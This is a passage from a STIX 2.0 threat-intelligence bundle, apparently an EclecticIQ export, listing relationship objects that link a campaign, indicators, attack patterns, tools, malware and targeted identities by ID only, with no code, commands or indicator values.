"created": "2019-02-23T16:30:28.980Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-95499e70-0eaf-4182-9098-e1676e414121",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f"
},
{
"id": "relationship--3019f876-2765-57f8-ac76-9d6a7e192b63",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.126Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--68e67ff9-fc05-5ec6-bd4c-e5caba9fc348",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.126Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "tool--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--c7c55199-db19-58a8-940a-62f7747e2f39",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "malware--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--e4acc0cb-83c3-52de-b2b0-8f219e8ac594",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--11f678b0-5714-5b22-b38f-6f564ab11570",
"created": "2018-12-31T16:12:37.655Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-58ab772a-a9b3-4c7d-8a75-1ac2afe132cf",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0"
},
{
"id": "relationship--b121c4f7-f936-5168-ae95-09a079342d2b",
"created": "2018-12-31T16:12:38.687Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-4b6a2f5c-c2b5-4410-8240-8158b804174c",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--1ec7af9c-ed09-5cab-aeff-36c9af162f35",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--2db60a8b-fc78-51ea-8f58-16ac63889b6e",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "tool--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--93afc15d-f326-5892-a587-69738379f817",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "malware--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--fa57e410-7ce8-5bfe-8bed-cf3573cb3d24",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--54603bc5-251a-5fb2-9e76-0b9f36808763",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "attack-pattern--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--ec2ed279-9c43-5d57-89cb-f7f36fbc4222",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "tool--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--8a97e1f5-90f6-5752-bda2-0383f05c6c6c",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "malware--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--18369035-0528-5916-a5d3-16785cb30f7f",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "x-indicated_ttps",
"target_ref": "identity--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--1da10acb-6917-58ad-acb9-d3c6ef6faec6",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "attack-pattern--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--75f9c241-80ce-5136-879a-f488ec181d80",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "tool--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--89fcf0a4-b40c-5b99-8ec6-a3a545ff9776",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "malware--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--b530b513-a18e-539c-a2ef-cbb145127227",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "identity--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--ff005842-0621-5616-9ff5-da2a16a860cc",
"created": "2018-12-31T16:12:41.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1e41a69a-5a2b-45b8-aa00-f93bfc7c178a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "derived-from",
"target_ref": "campaign--c2b46299-eb18-580a-a74f-bd68a12ae12d"
},
{
"id": "relationship--1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"created": "2019-02-23T16:30:28.977436+00:00",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\//ns}relation-f1f1dd06-bcb6-4b22-b12a-fce16a10e4dd",
"type": "relationship",
"modified": "2019-02-23T16:30:28.977436+00:00",
"source_ref": "attack-pattern--70108184-2109-4463-a68d-41cd48ab65ad",
"relationship_type": "derived-from",
"target_ref": "malware--1f1dd06-bcb6-4b22-b12a-fce16a10e4dd"
},
{
"id": "relationship--3c98de21-4fa9-4224-ba5d-619964829e7b",
"created": "2018-12-31T15:21:48.986351+00:00",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\//ns}relation-349762e7-0223-464d-b3dc-4b561e2bd789",
"type": "relationship",
"modified": "2018-12-31T15:21:48.986351+00:00",
"source_ref": "malware--f1f1dd06-bcb6-4b22-b12a-fce16a10e4dd",
"relationship_type": "derived-from",
"target_ref": "malware--349762e7-0223-464d-b3dc-4b561e2bd789"
}
],
"type": "bundle",
"id": "bundle--0932a712-2faf-4eb5-bd4e-88a6cacfb97b",
"spec_version": "2.0"
}